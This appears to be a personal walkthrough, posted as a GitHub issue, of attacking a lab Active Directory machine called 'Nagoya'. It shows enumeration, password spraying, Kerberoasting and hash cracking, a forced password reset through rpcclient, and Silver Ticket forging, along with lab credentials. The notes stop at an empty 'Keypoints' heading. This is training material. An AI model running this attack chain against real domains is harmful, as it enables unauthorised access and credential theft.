Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-11 05:49:11Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
--> no info
--> no info
ldapsearch -H ldap://192.168.208.21 -x -s base namingcontexts
-->
dn:
namingcontexts: DC=nagoya-industries,DC=com
namingcontexts: CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: CN=Schema,CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: DC=DomainDnsZones,DC=nagoya-industries,DC=com
namingcontexts: DC=ForestDnsZones,DC=nagoya-industries,DC=com
ldapsearch -H ldap://192.168.208.21 -x -b"DC=nagoya-industries,DC=com"
--> no info
/team --> Get a list of name --> made a username list (userlist.txt) that looks like this one below
/error
crackmapexec smb $IP -u userlist.txt -p /usr/shares/wordlists/rockyou.txt
--> no result
Guess a password is Summer2023 --> Reason: a wild guess that the nagoya machine was release on summer 2023.
crackmapexec smb 192.168.165.21 -u user.txt -p Summer2023
-->
Fiona.clark
smbclient -U 'Fiona.clark' //192.168.218.21/SYSVOL
Found "\nagoya-industries.com\scripts\ResetPassword\ResetPassword.exe" file
strings ResetPassword.exe
--> didn'd find interesting info
On kali, install ILSpy plugin for Visual Studio Code (Click on Extensions and search ILSpy). --> svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
impacket-GetUserSPNs -request nagoya-industries.com/fiona.clark:'Summer2023' -dc-ip 192.168.218.21
--> found a username: svc_mssql and hash
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$24ea48f39707997f007ceb4f3bc3124b$cd6271cfe64.......
crack the hash above
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
--> svc_mssql:Service1
evil-winrm -i 192.168.218.21 -u svc_mssql -p 'Service1'
evil-winrm -i 192.168.218.21 -u svc_helpdesk -p 'U299iYRmikYTHDbPbxPoYYfa2j4x4cdg'
--> all failed
rpcclient -U nagoya-industries/svc_helpdesk 192.168.218.21
Refer rpcclient commands (https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-smb/rpcclient-enumeration)
Found that Christopher.Lewis] rid:[0x46c] has 3 groups and others only have 2 groups --> group:[developers] rid:[0x46a]
Note: In the rpcclient tool, the setuserinfo function is used to modify user account information on a remote Windows system.
setuserinfo christopher.lewis 23 'Pass123!'
evil-winrm -i 192.168.218.21 -u christopher.lewis -p 'Pass123!'
svc_mssql is a service account and we found a folder at c:\user\svc_mssql. As we discover the svc_mssqlaccount but never see port 1433 open during nmap, we decide to check if it run locally via netstat. --> no 1433 port
mimikatz.exe didn't work..
To create a Silver Ticket, we need
Generate NTLM with "Service1" (https://www.browserling.com/tools/all-hashes) --> E3A0168BC21CFB88B95C954A5B18F57C
Get-ADdomain
Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
On kali, impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Export the variable
export KRB5CCNAME=$PWD/Administrator.ccache
impacket-mssqlclient nagoya-industries.com/svc_mssql:Service1@192.168.218.21 -windows-auth
--> doesn`t work because the port 1433/tcp doesn't open!
The local port also didn't open on 1433/tcp, so i cannot go ahead....
Keypoints: